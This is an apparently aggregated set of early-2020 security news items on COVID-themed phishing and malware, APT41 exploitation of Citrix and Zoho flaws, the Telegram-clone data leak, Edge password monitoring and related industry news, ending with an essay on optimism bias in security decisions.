The Kwampirs (aka Orangeworm) attack group continues to target global healthcare entities in this time of crisis, the FBI has warned. “Targeted entities range from major transnational healthcare companies to local hospital organizations,” the Bureau noted. “The FBI assesses Kwampirs actors gained access to a large number of global hospitals through vendor software supply chain and hardware products. Infected software supply chain vendors included products used to manage industrial control system (ICS) assets in hospitals.” … More

The post Kwampirs threat actor continues to breach transnational healthcare orgs appeared first on Help Net Security.

Privacy Snafu Exposes 42 Million ‘Telegram’ Records

Privacy Snafu Exposes 42 Million ‘Telegram’ Records

Security researchers have discovered tens of millions of accounts from a third-party version of Telegram that were leaked online in another cloud misconfiguration.

Bob Diachenko and the Comparitech team found the exposed data on March 21. It had been posted to an Elasticsearch cluster, password-free, by a group called “Hunting system” in Farsi.

Although the cluster was deleted on March 25, a day after Diachenko informed the hosting provider, at least one user had apparently already posted it to a hacking forum.

That’s bad news, because the trove contained 42 million records from a third-party version of popular messaging app Telegram. They included user account IDs, phone numbers, names, and hashes and secret keys.

As Telegram has been banned in Iran since anti-government protests in 2018, the database could put users at risk of being singled out by the authorities as having something to hide.

Although the hashes and keys can’t be used to access accounts, third-party hackers could use the other information in financially motivated attacks, warned Comparitech.

“SIM swap attacks are one example. A SIM swap attack occurs when the attacker convinces a phone carrier to move a phone number to a new SIM card, allowing them to send and receive the victim’s SMS messages and phone calls. The attacker could then receive their one-time access verification codes, granting full access to app accounts and messages,” explained privacy advocate, Paul Bischoff.

“Affected users could also be at risk of targeted phishing or scams using the phone numbers in the database.”

This isn’t the first such privacy incident involving messaging users in the country. In 2016, hackers identified the user IDs, phone numbers and one-time verification codes of 15 million Telegram users after activation codes were likely intercepted by phone carriers.

Houseparty Offers $1m for Info on ‘Smear Campaign’

Houseparty Offers $1m for Info on ‘Smear Campaign’

Houseparty is offering $1m for evidence of a suspected smear campaign, after several reports emerged that multiple users had had other online accounts compromised via the video conferencing app.

The platform has become extremely popular over recent weeks as consumers flock online to socialize safely during a time of lockdowns and social distancing.

However, similar reports in UK tabloid media outlets on Monday pointed to social media “hysteria” over Houseparty users claiming that their use of the app had somehow led to other accounts being compromised.

These include PayPal, Spotify, Amazon, Netflix, Instagram and eBay.

“Anyone who’s using the #Houseparty app be super careful. My bank account was hacked today and it has been linked back to the app. Lots of other people are experiencing the same thing. I’d definitely recommend deleting it,” noted one user in a typical post on Twitter.

However, security experts have leaped to Houseparty’s defense, claiming there’s no evidence linking Houseparty to compromises of other accounts. If the stories are true, it’s more than likely that reused passwords are to blame.

Experts recommended users switch to two-factor authentication for log-ins across as many sites as they can, and to use a password manager.

As a result of the outcry, the video conferencing platform said it is now looking at whether these rumors were a coordinated attempt to defame the company.

“We are investigating indications that the recent hacking rumors were spread by a paid commercial smear campaign to harm Houseparty. We are offering a $1m bounty for the first individual to provide proof of such a campaign,” it said on Twitter.

“All Houseparty accounts are safe - the service is secure, has never been compromised, and doesn’t collect passwords for other sites.”

Users have also complained on social media that when they tried to delete the app it required them to re-enter their password, and then claimed it was incorrect.

The MITRE ATT&CK Framework: Execution

Of all the tactics that an adversary will take on in their campaign, none will be more widely abused than, Execution (https://attack.mitre.org/wiki/Execution). When taking into consideration off-the-shelf malware, traditional ransomware, or state of the art advanced persistent threat actors, all of them have execution in common. There’s a great quote from Alissa Torres which says, […]… Read More

The post The MITRE ATT&CK Framework: Execution appeared first on The State of Security.

Microsoft Edge will warn users if their credentials have been compromised

Microsoft announced that it will add an alerting feature to Edge to warn users if their credentials saved to autofill have been compromised.

Microsoft announced several new features for its Edge browser, including a new alerting service to warn users if the credentials they have saved to autofill have been compromised in a third-party data breach.

“Today, we’re announcing Password Monitor in Microsoft Edge to help keep your online accounts safe from hackers. When enabled, Password Monitor is a feature that notifies you if the credentials you’ve saved to autofill have been detected on the dark web.” reads the advisory published by Microsoft.

In recent months, credential stuffing attacks continues to be a growing threat.

Credential stuffing attacks involve botnets to try stolen login credentials usually obtained through phishing attacks and third-party data breaches. This kind of attack is very efficient due to the bad habit of users of reusing the same password over multiple services.

To prevent that threat actors could abuse credentials obtained from third-party data breaches, the Microsoft Password Monitor feature implemented in the Edge web browser will notify users if the password they are entering using autofill has been offered for sale on the dark web.

“If Microsoft Edge uncovers a match with any of your saved username + passwords, you will receive a notification from within the browser prompting you to take action,” continues the announcement. “Through a dashboard in Settings, you can view a list of all leaked credentials and get routed to their respective websites to change your password. Once the password has been changed, save the new credential to autofill and continue browsing with peace of mind knowing that Microsoft Edge and Password Monitor have your back.”

Edge users will be able to view a list of all leaked credentials in the dashboard in Settings, then they will be redirected to their respective websites to change your password. Once the password has been changed, users have to save it to autofill and let the Password Monitor to alert it in case a future security breach would expose users’ credentials.

The new feature in the Password Monitor will be rolled out to the Insider channels in the next few months.

Other web browsers such as Firefox and Chrome already warn users about compromised passwords since October 2019.

Microsoft also announced the enhancement of the InPrivate browsing mode and a feature to prevent users’ tracking online.

Pierluigi Paganini

(SecurityAffairs – Edge browser, credential stuffing)

The post Microsoft Edge will warn users if their credentials have been compromised appeared first on Security Affairs.

Webinar – Getting Inside the Mind of an Attacker: TLS Attacks and Pitfalls

Transport Layer Security (TLS) is a common cybersecurity protocol that is frequently seen in email, web browsers, messaging, and other communication methods that take place over networks. TLS is relied upon to ensure secrecy using different techniques like encryption, hash functions, and digital signatures. These days, however, nothing is immune to attack, so despite being designed to improve security, threat actors have still managed to find ways to exploit TLS. In this webinar, you’ll learn … More

The post Webinar – Getting Inside the Mind of an Attacker: TLS Attacks and Pitfalls appeared first on Help Net Security.

Distributed disruption: Coronavirus multiplies the risk of severe cyberattacks

The coronavirus pandemic is upending everything we know. As the tally of infected people grows by the hour, global healthcare, economic, political, and social systems are bending and breaking under the strain, and for much of the world there’s no end in sight. But amid this massive wave of disruption, one thing hasn’t changed: the eagerness of cybercriminals to capitalize on society’s misfortune and uncertainty to sabotage, cripple, mislead and steal. New states of emergency … More

The post Distributed disruption: Coronavirus multiplies the risk of severe cyberattacks appeared first on Help Net Security.

Personalized Scams

Cyber criminals now have a wealth of information on almost all of us. With so many hacked organizations now a days, cyber criminals simply purchase databases with personal information on millions of people, then use that information to customize their attacks, making them far more realistic. Just because an urgent email has your home address, phone number or birth date in it does not mean it is legitimate.

Steering your network in the right direction with segmentation

Throughout history, individuals have taken innovations in their prime and tried to mold them into objects they were never designed to be. An example? The first cars were carriages with engines, the first powered ships were sailing ships with paddles, and so on. That said, history has shown us that there are also many limitations to evolving objects outside of their intended purpose and that these efforts often end in failure. Much like the flying … More

The post Steering your network in the right direction with segmentation appeared first on Help Net Security.

The potential impact of SAP security remediation

More than two thirds (68.8%) of SAP users believe their organizations put insufficient focus on IT security during previous SAP implementations, while 53.4% indicated that it is ‘very common’ for SAP security flaws to be uncovered during the audit process. These are key findings of the SAP Security Research Report by Turnkey Consulting. The research also uncovered that most respondents were not fully equipped to manage risk. A fifth (20.8%) felt most businesses did not … More

The post The potential impact of SAP security remediation appeared first on Help Net Security.

Researchers find shift in monthly web traffic amidst pandemic

There have been shifts in total web traffic broken down by the world’s largest industries as the COVID-19 pandemic has unfolded over the past several weeks, according to Imperva. Based on a weekly average compared to Jan. 19, 2020 traffic, industries that experienced an increase in web traffic from March 1 through March 22, 2020 include: News (+64%) Food and beverages (+34%) Retail (+28%) Gaming (+28%) Law and government (+17%) Education (+17%) Industries that faced … More

The post Researchers find shift in monthly web traffic amidst pandemic appeared first on Help Net Security.

Are You Ready for the Remote Work’s Toll on Corporate Security?

Given the situation that many companies, organizations and government agencies have been forced into working remotely due to COVID-19, it is imperative to give some thought about corporate security. Using a VPN for New Stay-at-Home Workers Millions of employees are now working from the confines of their own homes in an effort to keep businesses […]… Read More

The post Are You Ready for the Remote Work’s Toll on Corporate Security? appeared first on The State of Security.

CI Security Work From Home Security Policy Assessment helps orgs manage risks

CI Security, a Managed Detection and Response (MDR) services provider specializing in defending the networks of organizations and critical infrastructure, announced the addition of a Work From Home Security Policy Assessment to the company’s managed services offering. The Work From Home Security Policy Assessment provides a comprehensive view of the risks faced by an organization and its remote workforce, the capabilities of the organization to implement appropriate and effective security controls, including how to monitor … More

The post CI Security Work From Home Security Policy Assessment helps orgs manage risks appeared first on Help Net Security.

New RiskSense SRS outside-in capabilities extend inside-out risk scoring and prioritization

RiskSense, pioneering risk-based vulnerability management and prioritization, introduced Full Spectrum RBVM (Risk-based Vulnerability Management) that automatically discovers, analyzes, scores, and prioritizes both internal and external-facing security threat exposure across an organization’s IT infrastructure and applications. The cloud-delivered RiskSense solution now combines RBVM with RiskSense SRS (Security Rating Service) to provide 360 degree visibility that eliminates security gaps and enables security teams to measure, prioritize, and control both inside-out and outside-in risks from one integrated console. … More

The post New RiskSense SRS outside-in capabilities extend inside-out risk scoring and prioritization appeared first on Help Net Security.

Candid Wüest joins Acronis as Vice President of Cyber Protection Research

Acronis, a global leader in cyber protection, announced the appointment of Candid Wüest as Vice President of Cyber Protection Research at Acronis. Wüest will lead accelerated research into the latest trends in the threat landscape and new protection methods designed to continuously enhance the world’s most innovative cyber protection solutions. In his role at Acronis, Wüest will be the technical lead for the Acronis Cyber Protection Operation Centers (CPOC) EMEA, defining and leading research projects … More

The post Candid Wüest joins Acronis as Vice President of Cyber Protection Research appeared first on Help Net Security.

COVID-19 relief package provides another platform for bad actors

The ongoing COVID-19 pandemic continues to yield new subject matter that bad actors can turn into fodder for enticing victims into clicking on malicious links and attachments. On March 27, the CARES Act was signed into law by the President, enacting a wide range of stimulus packages designed to aid Americans and businesses during the crisis. One such measure will authorize a supplemental stimulus check to American citizens.

Along with the general increase in coronavirus and COVID-19-themed attacks, this stimulus package will also be leveraged as a lure to deliver additional attacks to harm the unsuspecting victim into divulging personal information or be subject to financially based exploitation.

Talos has already detected an increase in suspicious stimulus-based domains being registered and we anticipate they will be leveraged to launch malicious campaigns against users.

Read more

The post COVID-19 relief package provides another platform for bad actors appeared first on Cisco Blogs.

Crooks leverage Zoom’s popularity in Coronavirus outbreak to serve malware

COVID-19: Hackers Begin Exploiting Zoom’s Overnight Success to Spread Malware

Online communication platforms such as Zoom are essential instruments at the time of Coronavirus outbreak, and crooks are attempting to exploit their popularity.

The Coronavirus outbreak is changing our habits and crooks are attempting to take advantage of the popularity of online communication platforms such as Zoom that are used by businesses, school classrooms and normal users.

Zoom has over 74,000 customers and 13 million monthly active users, its popularity exploded with the COVID19 outbreak because the platform is used by millions of students, government and private employees.

According to a report published by Check Point, experts observed a significant increase in the number of registrations for new fake “Zoom” domains and malicious “Zoom” executable files, both are evidence of malicious campaigns carried out by experts.

“During the past few weeks, we have witnessed a major increase in new domain registrations with names including “Zoom”, which is one of the most common video communication platforms used around the world.” reads the analysis published by CheckPoint.

“Since the beginning of the year, more than 1700 new domains were registered and 25% of them were registered in the past week. Out of these registered domains, 4% have been found to contain suspicious characteristics.”

Check Point researchers observed over 1,700 new “Zoom” domains that have been registered since the beginning of the Coronavirus outbreak, with 25 percent of them registered in the last week.

Experts have also detected malicious files with names such as “zoom-us-zoom_##########.exe” and “Microsoft-teams_V#mu#D_##########.exe” (# representing various digits). The file acts as a dropper for the InstallCore PUA and could potentially deliver other malicious payloads.

Check Point pointed out that crooks are also targeting other applications widely adopted during this period due to the Coronavirus epidemic, such as Google Classroom.

Threat actors registered malicious domains like googloclassroom[.]com and googieclassroom[.]com to deliver malware.

Below the recommendations published by CheckPoint:

  1. Be cautious with emails and files received from unknown senders, especially if they are offering special deals or discounts.
  2. Don’t open unknown attachments or click on links within the emails.
  3. Beware of lookalike domains, spelling errors in emails and websites, and unfamiliar email senders.
  4. Ensure you are ordering goods from an authentic source. One way to do this is NOT to click on promotional links in emails, and instead, Google your desired retailer and click the link from the Google results page.
  5. Prevent zero-day attacks with a holistic, end to end cyber architecture.

Pierluigi Paganini

(SecurityAffairs – coronavirus, hacking)

The post Crooks leverage Zoom’s popularity in Coronavirus outbreak to serve malware appeared first on Security Affairs.

COVID-19 and the Human Side of Cybersecurity Leadership

Microsoft's Diana Kelley on Ensuring Care for the People Behind Those Processes and Technologies
When securing the remote workforce, it's important to be mindful of the human challenges - educating children, caring for elders and dealing with the barrage of COVID-19 news, says Microsoft's Diana Kelley, who shares insights on balancing cybersecurity and compassion.

FBI: Cybercrime Gang Mailing ‘BadUSB’ Devices to Targets

Malicious USB Devices Accompanied by Fake Gift Cards to Entice Would-Be Victims
The FBI warns that the notorious FIN7 cybercrime gang has a new trick up its sleeve: Mailing victims a $50 gift card portrayed as good for redeeming items listed on an accompanying USB storage device, which in reality downloads Griffon backdoor software to give attackers remote access.

Annual Protest to ‘Fight Krebs’ Raises €150K+

In 2018, KrebsOnSecurity unmasked the creators of Coinhive — a now-defunct cryptocurrency mining service that was being massively abused by cybercriminals — as the administrators of a popular German language image-hosting forum. In protest of that story, forum members donated hundreds of thousands of euros to nonprofits that combat cancer (Krebs means “cancer” in German). This week, the forum is celebrating its third annual observance of that protest to “fight Krebs,” albeit with a Coronavirus twist.

Images posted to the decidedly not-safe-for-work German-language image forum pr0gramm[.]com. Members have posted a large number of ‘thank you’ receipts from cancer research organizations that benefited from their fight cancer/krebs campaign.

On March 26, 2018, KrebsOnSecurity published Who and What is Coinhive, which showed the founder of Coinhive was the co-creator of the German forum pr0gramm[dot]com (not safe for work).  I undertook the research because Coinhive’s code at the time was found on tens of thousands of hacked Web sites, and Coinhive seemed uninterested in curbing widespread abuse of its platform.

Pr0gramm’s top members accused KrebsOnSecurity of violating their privacy, even though all of the research published about them was publicly available online. In protest, the forum’s leaders urged members to donate money to medical research in a bid to find a cure for Krebs (i.e. “cancer”). They ended up raising more than a quarter-million dollars worth of donations from members.

Last year’s commemoration of the protest fundraiser — dubbed “Krebsaction” by Pr0gramm — raised almost $300,000 for anti-cancer research groups. Interestingly, Coinhive announced it was shutting down around the same time as that second annual fundraiser.

This year’s Krebsaction started roughly three days ago and so far has raised more than 150,000 euros (~$165,000), with many Pr0gramm members posting screenshots of their online donations. The primary beneficiary appears to be DKMS, a German nonprofit that works to combat various blood cancers, such as leukemia and lymphoma.

The pr0gramm post kicking off this year’s “Krebsaction” fundraiser.

This year, however, Pr0gramm’s administrators exhorted forum members to go beyond just merely donating money to a worthy cause, and encouraged them to do something to help those most affected by the COVID-19/Coronavirus pandemic.

“This year pr0gramm-members shall not only donate but do a good act in terms of corona (and prove it), for example bring food to old people, bring proof of volunteering and such stuff,” reads the Pr0gramm image kicking off this year’s Krebsaction.  The message further states, “Posts mit geringem Einsatz können wir nicht akzeptieren,” which translates roughly to “Posts with little effort we cannot accept.”

Financial Sector Cybersecurity Framework Profile Consolidates Regulatory Requirements

Cyberattacks are an all too common occurrence, especially for financial institutions. In response, we are seeing an influx of security rules and regulations for financial institutions to follow. And ??? although the regulations are beneficial ??? complying with the regulations can be time consuming and costly.

According to findings from the technology division of the Banking Policy Institute (BITS), ???One firm???s Chief Information Security Officer estimated that 40 percent of his time and that of his team was devoted to reconciling various requirements of regulatory agencies.??? And a report from Boston Consulting Group (BCG) cited that a multinational bank was spending more than 15 percent of its annual operating budget on risk and compliance.

In an effort to mitigate the time and financial restraints, BCG, BITS, and more than 150 financial services institutions came together to develop the Financial Sector Cybersecurity Framework Profile. The profile consolidates regulatory requirements, making it easier to comply with multiple requirements. This is a major win for financial services institutions because, according to industry data collected by BITS, over 30 cybersecurity regulations have been released in the past five years, with plans to issue more. 

With the profile now in place, financial services institutions don???t have to answer a separate set of reporting questions to prove compliance with every rule and regulation. There is now one framework that encompasses all of the rules and regulations with a consolidated set of questions. According to BCG, having one common framework has reduced the number of questions by 49 percent for large organizations and 73 percent for small ones.

Aside from the decrease in compliance questions, the time and money saved from the profile helps financial institutions focus on the main aspects of their cybersecurity program, innovation, and ??? most importantly ???their clients.

The response from the new profile has been overwhelmingly positive. As Paul Farrington, EMEA Chief Technology Officer at Veracode stated:

???Financial services firms have to deal with a myriad of regulations, especially relating to cybersecurity. We need organisations to be held accountable for improving their security posture. Standards are vital, but reporting can be a real burden and, in some cases, gets in the way of doing valuable security work. We welcome the Financial Sector Cybersecurity Framework Profile. It should help teams fast-track compliance exercises and create capacity for additional security focus.???

Any financial institution, regardless of size, can leverage the profile. It encompasses more than 30 US federal, state, and global regulations, including the NIST Cybersecurity Framework, The International Organization for Standardization (ISO)/International Electrotechnical Commission (IEC) 27001, and The Committee on Payments and Market Infrastructures (CPMI)-International Organization of Securities. The profile should address up to 90 percent of regulatory requirements at one time, enabling companies to focus on threats. The hope is for the profile to incorporate more global regulations in the coming years.

For additional information on the new profile, please read the Financial Sector Cybersecurity Framework Profile user guide.

Ban Hasn’t Stopped COVID-19 Instagram Ads

Ban Hasn't Stopped COVID-19 Instagram Ads

Adverts and listings that capitalize on the COVID-19 outbreak are appearing on Instagram and Facebook despite being banned.

On March 6, Facebook and Instagram announced a temporary ban on ads and listings selling medical face masks on its marketplace. On March 19, Rob Leathern, head of trust and integrity for Facebook ads and business platform, extended the ban to include hand sanitizers, coronavirus testing kits, disinfecting wipes, and several other products.

Tenable's Satnam Narang has observed a growing number of adverts for COVID-19 essentials since the ban was issued.

"Despite the ban, advertisements continue to appear on Facebook and Instagram, some as recently as March 26," said Narang. 

"I began observing an uptick in activity in my Instagram Feed on Friday, March 20. All of a sudden, every single sponsored post in my Instagram Feed had something to do with masks, whether it be N95 masks, surgical masks or face shields."

Advertisers have carefully moderated the language they use in their ads in a slippery attempt to get around the ban.

"Many of the advertisements don’t overtly reference COVID-19 or the novel coronavirus that causes it in their posts," said Narang. "They do, however, talk about protecting oneself from 'harmful particles' and how to 'stay protected at all times' while referencing N95 masks or harmful viruses and bacteria, implying a connection to COVID-19."

Narang observed carefully worded ads appearing in his Instagram feed and showing up in his Instagram stories. Some were native to Instagram, but others originated from Facebook advertisers, including duamaskcom and Plengoods.

Alongside Facebook pages and Instagram accounts created recently for the sole purpose of promoting COVID-19-related items like N95 masks, Narang observed opportunists compromising the accounts of existing pages in order to advertise their products. 

"The Facebook Page for a Greek restaurant in Zimbabwe was compromised and used to push an advertisement for surgical masks to Instagram. The page does not appear to have been maintained since 2008," said Narang. 

But the crappy behavior of the few has not caused Narang to lose his faith in humanity. 

He told Infosecurity Magazine: "It’s certainly disheartening to see opportunists trying to profit from this crisis, but I’ve definitely seen a lot of kindness that gives me hope: People within communities volunteering to pick up groceries for the elderly, high-risk individuals creating blueprints to 3D print masks and other personal protective equipment, folks brokering deals to secure N95 masks for frontline workers, and retired medical professionals coming out of retirement to help out on the front line."

Narang urged users of these platforms to "help by reporting these ads using the built-in reporting functionality on social media services."

The new digital world and the Holodeck

The COVID-19 pandemic has challenged businesses to evolve their digital selves in new ways. An important lesson from 2020 is that every business must be digital. But we face real challenges before we reach digital utopia. John Kao, a world-renowned innovation and leadership expert, shares his views on the future of work and leadership as a result of the COVID-19 pandemic.

VoIP Carriers Investigated Over Fraudulent Robocalls

VoIP Carriers Investigated Over Fraudulent Robocalls

An American court has ordered injunctions against two telecom carriers that facilitated hundreds of millions of fraudulent robocalls to consumers in the United States.

The scam calls predominantly targeted elderly and vulnerable people, successfully conning victims out of personal information, money, and property. Many of the robocalls were made by fraudsters overseas impersonating government agencies and conveying alarming messages.

Victims were tricked into thinking that their assets were being frozen, their personal information had been compromised, or their benefits were about to be stopped. 

In some calls, fraudsters impersonated employees at legitimate businesses, including Microsoft. 

The injunctions, which relate to two separate civil actions, are the first of their kind to be obtained by the United States Justice Department. Both orders were issued by the US District Court for the Eastern District of New York, and both civil actions are pending.

The first injunction bars husband and wife Nicholas and Natasha Palumbo and two entities from operating as intermediate voice-over-internet-protocol (VoIP) carriers. 

The Palumbos, of Scottsdale, Arizona, own and operate Ecommerce National LLC and SIP Retail, which do business as TollFreeDeals.com and sipretail.com, respectively. The couple are currently being investigated for what the District Court described as “widespread patterns of telecommunications fraud, intended to deprive call recipients in the Eastern District of New York and elsewhere of money and property.”

The court noted that though the Palumbos had been warned more than 100 times of specific instances of fraudulent calls' being transmitted through their network, they never severed their business relationship with any entity they learned was associated with fraudulent call traffic.

In the second matter, the court entered consent decrees that permanently bar New York resident John Kahen, aka Jon Kaen, and three entities—Global Voicecom Inc, Global Telecommunication Services Inc., and KAT Telecom Inc.—from operating as intermediate VoIP carriers conveying any telephone calls into the US telephone system.

“These massive robocall fraud schemes target telephones of residents across our country, many of whom are elderly or are otherwise potentially vulnerable to such schemes,” said Assistant Attorney General Jody Hunt of the Department of Justice’s Civil Division.

Chinese-based threat actor act fast when vulnerabilities found, warns FireEye

The recent attempt by a Chinese-based threat actor to exploit vulnerabilities in enterprise products from Citrix, Cisco Systems and Zoho is a good example of why patches have to be tested and installed as soon as possible, a new report from FireEye suggests.

The report issued last week focuses on a group dubbed APT41, which between Jan. 20 and March 11 attempted to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers, including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, the UAE, the U.K. and the United States.

The campaign started 10 days after Citrix publicly revealed a vulnerability (CVE-2019-19781) had been found in Citrix Application Delivery Controller (ADC), formerly known as NetScaler ADC, and Citrix Gateway, formerly known as NetScaler Gateway, and Citrix SD-WAN WANOP appliance. The bug could allow an unauthenticated attacker to perform arbitrary code execution.

“This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage,” says the report.

Related:

Hashtag Trending – Hackers’ work interrupted; Zoom update removes Facebook code; Internet strain 

 

Citrix released a mitigation patch for CVE-2019-19781 on December 17, 2019. As of Jan. 24, it had released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP. While APT41 was looking for devices to exploit its real activity started February 1, suggesting that network admins that had applied the fixes would have been protected.

The report says on Feb. 21 a Cisco Small Business RV320 router at an unnamed telecommunications company was exploited by the gang and a file was downloaded. It isn’t known what exploit was used.

Then on March 8, APT41 attempted to exploit a vulnerability announced three days earlier (CVE-2020-10189) in some versions of the Zoho ManageEngine Desktop Central in more than a dozen FireEye customers. Five of those were actually hacked.

FireEye says it’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target. However, because the initial knocking on doors was only against Citrix devices it suggests APT41 had an already-known list of identified devices accessible on the internet.

FireEye believes the group has the backing of China and is known for conducting espionage for the government as well as a financially-motivated activity for itself.

The report notes the recent exploit attempts try to install publicly available backdoors such as Cobalt Strike and Meterpreter. “In previous incidents, APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks.”

Zeus Sphinx spam campaign attempt to exploit Coronavirus outbreak

The Zeus Sphinx malware is back, operators are now spreading it exploiting the interest in the Coronavirus outbreak.

The Zeus Sphinx malware is back, it was observed in a new wave of attacks attempting to exploit the interest in the Coronavirus outbreak.

Experts from IBM X-Force uncovered a hacking campaign employing the Zeus Sphinx malware, as known as Zloader or Terdot, that focus on government relief payments. 

The Zeus Sphinx malware was first observed on August 2015, a few days after a new variant of the popular Zeus banking trojan was offered for sale on hacker forums,

Now the Zeus Sphinx malware is back, operators are spreading it in a spam campaign aimed at stealing victims’ financial information.

Spam messages sent to the victims claim to provide information related to the Coronavirus outbreak and government relief payments

“Current malspam campaigns feature booby-trapped document files named “COVID 19 relief” and subject lines relying on the same theme. Sphinx’s targets have not changed from its past configuration files as it continues to focus on banks in the US, Canada, and Australia.” reads the analysis published by IBM Z-Force.

The Zeus Sphinx variant used in the recent Coronavirus-themed campaign is only slightly different than the original. 

Spam emails include a form, in an MS Word format, that must be filled out to receive funds to help people that now are at home due to the COVID 19 pandemic. The document is password-protected, likely to prevent analysis before it is received by the potential victim, the password is included in the content of the email.

Once opened, the document displays a message to instruct victims in enabling macros to view the content, unfortunately this action start the infection process.

“Once the end user accepts and enables these malicious macros, the script will start its deployment, often using legitimate, hijacked Windows processes that will fetch a malware downloader.” continues the post.”Next, the downloader will communicate with a remote command-and-control (C&C) server and fetch the relevant malware — in this case, the new Sphinx variant.”

Zeus Sphinx gains persistence by dynamically writing itself to numerous files and folders, it also created registry keys for the same purpose.

Sphinx signs the malicious code using a digital certificate, a common evasion technique, when injected into the browser processes.

Experts observed that web injections are in some cases still based on the Zeus v2 codebase. Zeus Sphinx will patch processes associated to Explorer and common browsers, including Chrome and Mozilla Firefox. In this way, the malicious code is triggered when a user visits a target page, such as an online banking platform.

“As a modular banking Trojan that’s based on the dated Zeus v2 code, Sphinx’s core capability is to collect online account credentials from banks and a wide range of other websites.” continues the post. “It calls on its C&C server to fetch relevant web injections when infected users land on a targeted page and uses them to modify the pages users are browsing to include social engineering content and trick them into divulging personal information and authentication codes.”

Experts pointed out that if a browser pushes an update, the web injection function will likely not “survive.”

The report published by IBM X-Force also provided technical details about the threat, including IoCs.

Unfortunately, the number of COVID19-themed attacks continue to increase, if you are interested to receive info about the attacks observed in the last week give a look at:

Pierluigi Paganini

(SecurityAffairs – Zeus Sphinx Trojan, Coronavirus)

The post Zeus Sphinx spam campaign attempt to exploit Coronavirus outbreak appeared first on Security Affairs.

Covid-19 Crisis: How to Manage VPNs

Practitioners Share Insights on How They're Addressing VPN Shortcomings
Security practitioners around the world are struggling to cope with the challenges posed by remote workers heavily relying on virtual private networks during the Covid-19 pandemic. Here's a look at steps to take to help enhance security.

Decision Making Before and During Times of Crisis:  A Parallel Between Cybersecurity Incidents and the Current COVID-19 Pandemic

The coronavirus pandemic is not only the first time in history when a biological virus also affects the cybersecurity industry (through phishing attacks and COVID-19-themed malware) but the way the breakout has been handled so far also resembles the way certain IT decision-makers may react when it comes to dealing with security issues.

Until now, the crisis has been approached from different angles by governments around the world. The pandemic is now causing major disruptions in the way we live and work, and perhaps, irreversibly. It is an unprecedented health and economic disaster, which puts our collective ability to respond to the test.

How prepared are governments when disaster strikes? How about us as citizens? Why don’t we all focus on prevention rather than on dealing with the consequences?

A comparison between decision making in Cybersecurity and the COVID-19 pandemic

If you think about it, in many cases, cyber-attacks and malware behave and spread in ways similar to a pandemic. Some digital threats are even called “viruses”, after all.

But how are decisions taken during the current pandemic versus before and during a cybersecurity crisis?

Without the intention of trying to oversimplify the complexity and severity of the COVID-19 pandemic, I’ve discovered some similarities that I would like to point out.

#1. Inaction fueled by optimism bias

Even though we like to think of ourselves as rational creatures, it’s in human nature to disregard risk associated with – well, anything…

Why? The optimism bias phenomenon is to be blamed. In short, it refers to the belief that we have lower chances of being affected by negative events than other people and that we are more likely to experience positive events than our peers.

The term was coined by Neil D. Weinstein in 1980, who through his experiment discovered that most college students thought their chances of developing a drinking problem or getting divorced were lower than that of their colleagues. Simultaneously, the majority of these students also believed that their chances of positive things happening to them (such as owning a house and growing old) were much higher.

In a recent article, Marie Helweg-Larsen, Professor of Psychology, argues that certain people are refusing to change their behavior during the current coronavirus pandemic due to optimism bias. For instance, if you don’t believe chances are you may be infected, you might think that interacting with your grandmother won’t be harmful. This way, due to the infection’s uncertainty, you tend to minimize risk.

The perception around risk can be difficult to change. But since social distancing and staying at home are now typically considered the moral thing to do, people may be more likely to change their attitude when thinking about keeping others safe (and not themselves, in particular). So, no longer focusing on your own personal risk may fuel a more protective behavior.

Obviously, not only regular citizens found themselves under the optimism bias since the COVID-19 pandemic has emerged. In the same manner, leaders around the world have been crippled by inertia and tended to underestimate the critical impact the novel coronavirus would have on their countries, healthcare systems, and the economy.

How common is optimism bias in cybersecurity?

Of course, optimism bias can also be observed in the cybersecurity field. In short, this phenomenon prevents some security leaders from taking preventative measures and therefore hinders companies from achieving a good security posture.

The results of a study revealed that security executives are indeed affected by the optimistic bias. The report shows they thought their risk to be substantially lower than that of the companies they were compared with. Furthermore, they seemed to be aware of the existing risks, yet still could not completely grasp the potential consequences’ magnitude.

The same study has shown that subjects, at the very least, acknowledged their interconnectedness with their business partners. Even though they considered themselves to be less prone to risk than other companies, they seemed to perfectly understand that they could themselves become victims due to other parties they have partnered up with. These dangers are nowadays commonly referred to as Supply Chain Attacks or Vendor Email Compromise (VEC) threats.

How to avoid bias when building your cybersecurity strategy

Biases impact decision-making processes and obviously, the cybersecurity industry is no exception to the rule.

So, how can you, as an IT decision-maker, avoid being under the influence of cognitive biases?

Here are a few points to consider:

  • Becoming aware of optimism bias and accepting that the phenomenon is an inherent part of us as humans. This is the first step toward taking impartial, unbiased decisions.
  • Looking at real-life examples. Understanding how organizations that match your own profile were impacted by cyberattacks and analyzing how your company would react when faced with a similar scenario. Would it be prepared to deal with an attack or miserably fail? How cyber resilient is your organization?
  • Thinking about the overall positive impact of a strong cybersecurity strategy on your business. Now, organizations should not simply being applying scare tactics upon themselves and should start realizing how threat prevention and mitigation will keep their company up and running.

#2. Testing and micro-segmentation

So far, countries that have proved to be the most successful in managing COVID-19 infections behaved the same way cyber resilient organizations do. And the ones that failed to keep the epidemic under control did not have all the prevention and mitigation measures in place.

For instance, as the epidemic was (not so) slowly increasing, Britons were encouraged to “keep calm and carry on” and let the herd immunity strategy, which was heavily criticized in the end, do the trick. Prime Minister Boris Johnson later admitted that Britain was going through the “greatest public health crisis for a generation” and started implementing some forms of social distancing measures.

After the first American case was announced in late January, when asked if he believed this would turn into a pandemic, President’s Donald Trump response was “No. Not at all. And we have it totally under control. It’s one person coming in from China, and we have it under control. It’s going to be just fine.”

In early March, Trump was still suggesting that the virus was “less serious than the flu” and reassuring people that “It will go away. Just stay calm. It will go away.” Meanwhile, the U.S. was falling behind on testing and some Trump administration officials were responding with untruths, suggesting that anyone who wanted could get tested when in reality, there was a shortage of testing kits. As of March 30, 2020, the U.S. has the most confirmed COVID-19 cases in the world, surpassing China, Italy, and Spain.

In the meantime, South Korea, Singapore, and Taiwan have managed to contain the outbreak due to diligent testing and social distancing measures.

